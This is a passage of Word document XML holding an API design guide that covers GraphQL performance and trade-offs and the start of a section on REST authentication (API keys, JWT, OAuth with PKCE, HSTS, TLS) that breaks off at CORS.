    <w:p w14:paraId="06A4AD6A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="769D6025" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Performance characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7E64D4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  N+1 query problem: resolver for each item issues individual DB query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EED662" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    → N items × 1 query each = N+1 total queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A33E5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Solution: DataLoader (batches and caches queries within one GraphQL request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9CBB5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CD04D4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Query complexity: malicious client → deeply nested query → expensive to execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723F0045" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Solution: query depth limiting, complexity analysis, timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FA4D4D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="1E747517" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>When GraphQL is the right choice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BCBF68" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Mobile apps: bandwidth-constrained, different screens need different data shapes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0807E0A3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Public API with diverse client needs: each client fetches what it needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31417767" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Rapidly evolving frontend: frontend changes field needs without backend changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378E6803" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D38FA67" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>When it's not:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB2DEA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Service-to-service: REST or gRPC simpler (GraphQL overhead not worth it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024D4473" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Simple CRUD: overkill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6947AC78" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  High-throughput APIs: JSON parsing overhead, complex query execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB05660" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EEAF76" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE352F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  REST:     fixed shape per endpoint, simple, cacheable, universal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DB1487" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  gRPC:     binary, streaming, type-safe, internal services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AF71B0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GraphQL:  flexible shape, client-specified, complex queries, frontend-driven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA91D1E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="524CAB2F">
          <v:rect id="_x0000_i6622" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECED9E0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Security — Authentication and Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30890EEA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REST Security Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150DE4C0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D6700" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A354F42" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3A2E4BCD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>1. API Key (simplest):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1ED37D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Header: X-API-Key: sk_live_4xjZ2kLmNpQrStUvWx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A417FC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Or: Authorization: ApiKey sk_live_4xjZ2kLmNpQrStUvWx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C38F384" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Or: Query param: ?api_key=sk_live_4xjZ2kLmNpQrStUvWx (avoid — logs URLs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE2E80C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EECC6B6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Server: look up API key in database → get associated account/permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C90105B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Use: server-to-server, simple external APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD03D89" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Revocation: delete from database → immediate effect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D59FBD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765DEFF2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>2. JWT (Bearer Token):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCB1266" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658D93B7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0368CA52" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Header: {"alg": "RS256", "typ": "JWT"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66266269" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Payload: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699A3FF1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     "sub": "usr_123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D93ECAC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     "email": "alice@example.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEB6073" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     "roles": ["user"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DFC6B5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     "iat": 1705315200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D71108" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     "exp": 1705401600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B51C60" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690E58C1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Signature: RSA-SHA256(base64url(header) + "." + base64url(payload), private_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666FD8B3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD93D24" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Server: verify signature with public key (no database lookup needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080B806C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Stateless: scale horizontally without shared session state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4A69E7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCDA561" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   JWT security requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E2147" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Algorithm: RS256 or ES256 (asymmetric) — not HS256 (symmetric, same key = security risk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415F6C9F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Key rotation: support multiple public keys (jwks_uri), rotate private key periodically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D6E2B6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Expiry: short (15 minutes for access tokens), refresh with refresh token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C41684" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Claims validation: iss, aud, exp MUST be validated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A09AD8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676148F4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Revocation problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A38957B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     JWT: self-contained, valid until expiry even if "logged out"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CB4530" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C29EA14" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       Short expiry (15 min) + refresh tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F05B81E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       Allowlist/blocklist in Redis (adds latency, defeats statelessness)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697508E0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">       Opaque tokens (reference tokens → lookup on each request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E25922" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="0B824C70" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>3. OAuth 2.0 + OIDC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BB2B6C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Authorization Code Flow (web apps, mobile):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D93B1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     1. Redirect user to auth server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3797D5C0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     2. User authenticates, grants consent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F00888" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     3. Auth server redirects back with authorization code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518424D1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     4. Client exchanges code for access token + refresh token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558556D7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     5. Client uses access token for API calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77616C0A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7AB816" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Client Credentials Flow (machine-to-machine):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F518F4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     1. Service sends client_id + client_secret to auth server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CB374F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     2. Receives access token (no user involved)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0915B668" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     3. Uses token for API calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21036C0E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B551860" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   PKCE (Proof Key for Code Exchange):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A94D2B3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Required for: public clients (mobile, SPA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A63DCDE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Prevents: authorization code interception attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541D0132" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C3BF1E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>HTTPS enforcement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B87C794" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  HTTP Strict Transport Security (HSTS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13003EFA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7CB7DE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    → Browser: always use HTTPS for this domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA67838" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    → Preload: include in browser's hardcoded HSTS list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5EDB80" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2517B191" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  TLS configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1903C917" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Minimum TLS 1.2 (disable TLS 1.0, 1.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414640C9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Preferred: TLS 1.3 (faster handshake, better security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F303929" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Cipher suites: prefer ECDHE (forward secrecy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380DA114" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Certificate: rotate annually (or use Let's Encrypt auto-renewal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE9452B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="790F78B4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>CORS (Cross-Origin Resource Sharing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61969BC8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Browser security: script from origin-A cannot fetch from origin-B without CORS headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E33460" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
